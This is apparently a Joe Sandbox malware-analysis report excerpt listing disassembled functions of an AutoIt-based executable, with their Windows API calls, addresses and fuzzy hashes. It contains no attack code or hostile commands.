                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$FullNamePath$AttributesCreateDirectoryErrorLastMoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1724171360-1173974218
                                                                        • Opcode ID: 5716471696b6b9cabd176b1dea1ea046d076b3328f90696da1b6f92e188e514b
                                                                        • Instruction ID: fdf195fb63787ee941cdb51a87eb0e5c084b5c9085df1295514fdc9c7a734c90
                                                                        • Opcode Fuzzy Hash: 5716471696b6b9cabd176b1dea1ea046d076b3328f90696da1b6f92e188e514b
                                                                        • Instruction Fuzzy Hash: 37311D72D0431D9ADF25DBA4C849FEE73B9AF4C304F0440AAA809E3152EA74D689CF91
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00958FE7
                                                                        • GetWindowLongW.USER32(0102D148,000000F0), ref: 0095901A
                                                                        • GetWindowLongW.USER32(0102D148,000000F0), ref: 0095904F
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00959081
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009590AB
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 009590BC
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009590D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: 710a7af325e35318dc90abef1b3b5893a495cb71e4ff18e765af459eb490560d
                                                                        • Instruction ID: 6129f438f399771cfb4e94333b5b66f1e0a31bea26412aa8de8b89be1b913fcb
                                                                        • Opcode Fuzzy Hash: 710a7af325e35318dc90abef1b3b5893a495cb71e4ff18e765af459eb490560d
                                                                        • Instruction Fuzzy Hash: 7F314435618214EFEB20CF69DC88F6537B9FB8A365F140264F9198B2F1CB71A844EB40
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009308F2
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00930918
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0093091B
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930939
                                                                        • SysFreeString.OLEAUT32(?), ref: 00930942
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00930967
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930975
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 783d8dba7601d9606205ccb9feb4f54c2faf801fa8b39848c000e5fdbf53a9c3
                                                                        • Instruction ID: 81975f1e8db5c2f3b2b15899d42025f61db2f1df52a163e036f518eef88df454
                                                                        • Opcode Fuzzy Hash: 783d8dba7601d9606205ccb9feb4f54c2faf801fa8b39848c000e5fdbf53a9c3
                                                                        • Instruction Fuzzy Hash: 5121B572605208AFEB109F68CC88EBB73BCEF49760B008525F909DB1A1D674ED418B60
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 19dc6ceb6df64f01b5ae5a7ec71d8a4506c9495826fe366fed67aae75b8ed900
                                                                        • Instruction ID: c68ccf437a4693fc8350ead072ec448c7806f66335b858f80ecdba9d5c8e4543
                                                                        • Opcode Fuzzy Hash: 19dc6ceb6df64f01b5ae5a7ec71d8a4506c9495826fe366fed67aae75b8ed900
                                                                        • Instruction Fuzzy Hash: 1F21377220821577C720AB349C16FBB73ADEFA5310F508429F546D71C1E765AA82CB95
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009309CB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009309F1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 009309F4
                                                                        • SysAllocString.OLEAUT32 ref: 00930A15
                                                                        • SysFreeString.OLEAUT32 ref: 00930A1E
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00930A38
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930A46
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 4a716dbf9bc55718457ce7531772e93d8576f5eccc7fec5aed8dc6349b9535af
                                                                        • Instruction ID: 535a817558479440c8ef5f140b2bd5543ce6795de16a9cc639fd59708f1b5819
                                                                        • Opcode Fuzzy Hash: 4a716dbf9bc55718457ce7531772e93d8576f5eccc7fec5aed8dc6349b9535af
                                                                        • Instruction Fuzzy Hash: 28219876215204AFDB10DFB8DC99DBB77ECEF49360B408125F909CB2A1D674EC819B64
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0095A32D
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0095A33A
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0095A345
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0095A354
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0095A360
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: c1320d00fc05fa5ac25ad4d91f85e5cd62bd2d722a1be88f9d8db9750d702328
                                                                        • Instruction ID: 3c461d5f9f1606f309dc839ac7c7064f9e368d510c51f97b6b1a4ba5ff27b6a6
                                                                        • Opcode Fuzzy Hash: c1320d00fc05fa5ac25ad4d91f85e5cd62bd2d722a1be88f9d8db9750d702328
                                                                        • Instruction Fuzzy Hash: 0D11D0B1110219BEEF149FA1CC85EEB7F6DFF48398F014214BA08A60A0C6729C21DBA4
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 0090CCF6
                                                                        • GetWindowRect.USER32(?,?), ref: 0090CD37
                                                                        • ScreenToClient.USER32(?,?), ref: 0090CD5F
                                                                        • GetClientRect.USER32(?,?), ref: 0090CE8C
                                                                        • GetWindowRect.USER32(?,?), ref: 0090CEA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: a3620fb393fff95ad08fc9ac30f49a31e09e26aedb188ecd70a6673ffb43e738
                                                                        • Instruction ID: fd58dabda665edc6a2adecd6c36e6555946eb5686987182be1e3449bca6730aa
                                                                        • Opcode Fuzzy Hash: a3620fb393fff95ad08fc9ac30f49a31e09e26aedb188ecd70a6673ffb43e738
                                                                        • Instruction Fuzzy Hash: 53B128B9900249DFDF10CFA8C5847EEBBB5FF08350F149629EC59AB290DB34A950DB64
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00951C18
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00951C26
                                                                        • __wsplitpath.LIBCMT ref: 00951C54
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscat.LIBCMT ref: 00951C69
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00951CDF
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00951CF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1380811348-0
                                                                        • Opcode ID: 4ae9bc777a2bf4ac47834e05a062fe7f4427570335c213b4bedb888b8e578690
                                                                        • Instruction ID: 359151ea088231c7539b9c6a250600553670f83c52b22582cdc67f99de36f95c
                                                                        • Opcode Fuzzy Hash: 4ae9bc777a2bf4ac47834e05a062fe7f4427570335c213b4bedb888b8e578690
                                                                        • Instruction Fuzzy Hash: 58513E715083449FD720EF24D885FABB7ECEF88754F00491EF98A97291EB709A45CB92
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009530AF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009530EF
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00953112
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0095313B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0095317E
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0095318B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3451389628-0
                                                                        • Opcode ID: 088c942d47ba836f99b4986972d9f6d190a598271a2d58cc8605dddf5458cd40
                                                                        • Instruction ID: 9f7fdd5213bf86ab782675853f95808ffde03c41a2ba01697162c03fa751265e
                                                                        • Opcode Fuzzy Hash: 088c942d47ba836f99b4986972d9f6d190a598271a2d58cc8605dddf5458cd40
                                                                        • Instruction Fuzzy Hash: 19515B31208304AFC700EF69C885E6AB7F9FF89344F04891DFA55972A1DB31EA09CB52
                                                                        APIs
                                                                        • GetMenu.USER32(?), ref: 00958540
                                                                        • GetMenuItemCount.USER32(00000000), ref: 00958577
                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0095859F
                                                                        • GetMenuItemID.USER32(?,?), ref: 0095860E
                                                                        • GetSubMenu.USER32(?,?), ref: 0095861C
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0095866D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                        • String ID:
                                                                        • API String ID: 650687236-0
                                                                        • Opcode ID: f41bc4feb1240cb6be5baaf1cf851da71aa57e56201b8d67a07c3808db7ee0cf
                                                                        • Instruction ID: 7933c4db662f5e134f64c5484bb7908138810ccd4eff7d04b2d5cd9a6ce7a6b7
                                                                        • Opcode Fuzzy Hash: f41bc4feb1240cb6be5baaf1cf851da71aa57e56201b8d67a07c3808db7ee0cf
                                                                        • Instruction Fuzzy Hash: DE519C71A01219AFCB11EFA9C845AAEB7F8FF48310F104499FD05BB391DB34AE458B91
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00934B10
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934B5B
                                                                        • IsMenu.USER32(00000000), ref: 00934B7B
                                                                        • CreatePopupMenu.USER32 ref: 00934BAF
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00934C0D
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00934C3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: 4b77f9f825d54ae5a12cddb68838127f5e277857b34ea3f660362be9bf8d79f4
                                                                        • Instruction ID: 6aaaff51eb76a7b92ac9f39807e98aeb00690e68e02f3bbf33cb43e01497a009
                                                                        • Opcode Fuzzy Hash: 4b77f9f825d54ae5a12cddb68838127f5e277857b34ea3f660362be9bf8d79f4
                                                                        • Instruction Fuzzy Hash: 7651C070A02209EFDF20CF68D888BEDBBF8EF44318F154159E4959B291D375A984CF51
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0098DC00), ref: 00948E7C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948E89
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00948EAD
                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00948EC5
                                                                        • _strlen.LIBCMT ref: 00948EF7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948F6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_strlenselect
                                                                        • String ID:
                                                                        • API String ID: 2217125717-0
                                                                        • Opcode ID: ad4f8de9b7c15ebeb6b7eb616f1fae77e22d44c3de81c0821d4a1b021b9921fa
                                                                        • Instruction ID: bae0ed4f3fcd2a0ba19ace1da8cdd8377dc58448bceff54f79c1f35273e09cf7
                                                                        • Opcode Fuzzy Hash: ad4f8de9b7c15ebeb6b7eb616f1fae77e22d44c3de81c0821d4a1b021b9921fa
                                                                        • Instruction Fuzzy Hash: 30417171500208AFCB18EB68CD96EAEB7B9EF58314F104699F51AD72D1DF30AE44CB61
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • BeginPaint.USER32(?,?,?), ref: 0090AC2A
                                                                        • GetWindowRect.USER32(?,?), ref: 0090AC8E
                                                                        • ScreenToClient.USER32(?,?), ref: 0090ACAB
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0090ACBC
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 0090AD06
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0096E673
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: 66e01eeb5caac14374619bcb667210af17f2d4db8c3a5f3786366a12e43327e9
                                                                        • Instruction ID: ef004cd69913ae2880acbb668a62f5c2319623e8e6b23af575116f4a800185ec
                                                                        • Opcode Fuzzy Hash: 66e01eeb5caac14374619bcb667210af17f2d4db8c3a5f3786366a12e43327e9
                                                                        • Instruction Fuzzy Hash: 8B419F71109300DFD710DF24DC84FAA7BB8AF55730F140669F9A8862E1C731A885EBA2
                                                                        APIs
                                                                        • ShowWindow.USER32(009B1628,00000000,009B1628,00000000,00000000,009B1628,?,0096DC5D,00000000,?,00000000,00000000,00000000,?,0096DAD1,00000004), ref: 0095E40B
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0095E42F
                                                                        • ShowWindow.USER32(009B1628,00000000), ref: 0095E48F
                                                                        • ShowWindow.USER32(00000000,00000004), ref: 0095E4A1
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0095E4C5
                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0095E4E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: d2b93c64bbe20cc15c691dfb6e6f9cbbff4e4a3d2a7e1d1c8cb51ccdd73c730d
                                                                        • Instruction ID: 0ee9be81aa77b1475759c9d0d924a89aa1ef2bf2a6f1731262788340f8f529de
                                                                        • Opcode Fuzzy Hash: d2b93c64bbe20cc15c691dfb6e6f9cbbff4e4a3d2a7e1d1c8cb51ccdd73c730d
                                                                        • Instruction Fuzzy Hash: 8F413D31605140EFDB2ACF25C499B947BE5BF09306F1841B9EE5C8F2B2C732A989CB51
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 009398D1
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00939908
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00939924
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0093999E
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009399B3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 009399D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 2537439066-0
                                                                        • Opcode ID: 9acb793f3cff4a0e716905ab3721d9dc223af635b0e7e79b6225a69327e23e71
                                                                        • Instruction ID: 37f52e01f0dfd339b5b2781d2e9fc8ff9cf632aebc93f4aa9867ffbba19bae08
                                                                        • Opcode Fuzzy Hash: 9acb793f3cff4a0e716905ab3721d9dc223af635b0e7e79b6225a69327e23e71
                                                                        • Instruction Fuzzy Hash: B9317032A00105EFDB10AF94DC85B6AB778FF85710B1480A9F909AB296D774DA54DBA0
                                                                        APIs
